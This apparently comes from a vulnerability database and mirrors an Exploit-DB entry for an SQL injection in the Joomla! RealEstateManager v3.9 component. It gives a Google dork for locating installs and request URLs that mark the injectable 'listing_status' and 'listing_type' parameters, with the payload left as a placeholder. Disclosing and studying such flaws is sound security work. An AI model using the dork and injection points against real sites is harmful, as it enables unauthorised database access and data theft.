header-logo
Suggest Exploit
vendor:
RealEstateManager
by:
Ihsan Sencan
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RealEstateManager
Affected Version From: 3.9
Affected Version To: 3.9
Patch Exists: NO
Related CWE: N/A
CPE: a:ordasoft:realestatemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component RealEstateManager v3.9 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component RealEstateManager v3.9. An attacker can send a malicious SQL query to the vulnerable parameter 'listing_type' or 'listing_status' in the 'search' script via the 'searchtext' parameter to execute arbitrary SQL commands in application's database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_realestatemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
# Demo: http://ordasvit.com/joomla-real-estate-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
# # # # #